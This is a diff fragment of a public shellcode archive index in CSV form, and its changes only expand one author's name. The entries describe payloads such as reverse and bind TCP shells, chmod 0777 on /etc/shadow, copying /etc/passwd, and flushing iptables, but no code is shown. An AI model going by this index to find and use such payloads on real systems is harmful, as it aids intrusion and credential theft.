 43750,shellcodes/linux_x86/43750.asm,"Linux/x86 - Copy /etc/passwd to /tmp/outfile Shellcode (97 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
 43751,shellcodes/linux_x86/43751.asm,"Linux/x86 - shift-bit execve() Encoder Shellcode (114 bytes)",2009-01-01,"Shihao Song",shellcode,linux_x86
 43752,shellcodes/linux_x86/43752.asm,"Linux/x86 - execve() Using JMP-FSTENV Shellcode (67 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
-43753,shellcodes/linux_x86/43753.c,"Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes)",2014-06-22,"Osanda Malith",shellcode,linux_x86
-43754,shellcodes/linux_x86/43754.c,"Linux/x86 - shutdown -h now Shellcode (56 bytes)",2014-06-27,"Osanda Malith",shellcode,linux_x86
+43753,shellcodes/linux_x86/43753.c,"Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes)",2014-06-22,"Osanda Malith Jayathissa",shellcode,linux_x86
+43754,shellcodes/linux_x86/43754.c,"Linux/x86 - shutdown -h now Shellcode (56 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86
 43755,shellcodes/linux_x86/43755.c,"Linux/x86 - Bind TCP (1337/TCP) Shell Shellcode (89 bytes)",2014-07-13,"Julien Ahrens",shellcode,linux_x86
 43756,shellcodes/linux_x86/43756.c,"Linux/x86 - Reverse TCP (127.1.1.1:1337/TCP) Shell Shellcode (74 bytes)",2014-07-25,"Julien Ahrens",shellcode,linux_x86
 43757,shellcodes/linux_x86/43757.c,"Linux/x86 - setreuid() + execve(/usr/bin/python) Shellcode (54 bytes)",2014-05-08,"Ali Razmjoo",shellcode,linux_x86
@@ -806,7 +806,7 @@ id,file,description,date,author,type,platform
 43511,shellcodes/irix/43511.c,"IRIX - execve(/bin/sh) Shellcode (68 bytes)",2009-01-01,scut/teso,shellcode,irix
 43512,shellcodes/irix/43512.c,"IRIX - stdin-read Shellcode (40 bytes)",2009-01-01,scut/teso,shellcode,irix
 43520,shellcodes/arm/43520.c,"Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes)",2017-03-31,dummys,shellcode,arm
-43530,shellcodes/arm/43530.c,"Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes)",2015-03-02,"Osanda Malith",shellcode,arm
+43530,shellcodes/arm/43530.c,"Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes)",2015-03-02,"Osanda Malith Jayathissa",shellcode,arm
 43531,shellcodes/arm/43531.c,"Linux/ARM - chmod( /etc/passwd 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm
 43532,shellcodes/arm/43532.c,"Linux/ARM - creat(_/root/pwned__ 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm
 43533,shellcodes/arm/43533.c,"Linux/ARM - execve(_/bin/sh__ []_ [0 vars]) Shellcode (35 bytes)",2013-09-04,gunslinger_,shellcode,arm
@@ -821,11 +821,11 @@ id,file,description,date,author,type,platform
 43546,shellcodes/linux_sparc/43546.c,"Linux/SPARC - setreuid(0_0) + execve() Shellcode (72 bytes)",2009-01-01,"Michel Kaempf",shellcode,linux_sparc
 43549,shellcodes/linux_x86-64/43549.c,"Linux/x64 - Execute /bin/sh Shellcode (27 bytes)",2009-01-01,Dad_,shellcode,linux_x86-64
 43550,shellcodes/linux_x86-64/43550.c,"Linux/x64 - Execute /bin/sh Shellcode (24 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
-43551,shellcodes/linux_x86-64/43551.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith",shellcode,linux_x86-64
+43551,shellcodes/linux_x86-64/43551.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64
 43552,shellcodes/linux_x86-64/43552.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
 43553,shellcodes/linux_x86-64/43553.c,"Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
 43554,shellcodes/linux_x86-64/43554.c,"Linux/x64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64
-43555,shellcodes/linux_x86-64/43555.c,"Linux/x64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith",shellcode,linux_x86-64
+43555,shellcodes/linux_x86-64/43555.c,"Linux/x64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64
 43556,shellcodes/linux_x86-64/43556.asm,"Linux/x64 - shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
 43557,shellcodes/linux_x86-64/43557.asm,"Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
 43558,shellcodes/linux_x86-64/43558.asm,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)",2014-09-04,Keyman,shellcode,linux_x86-64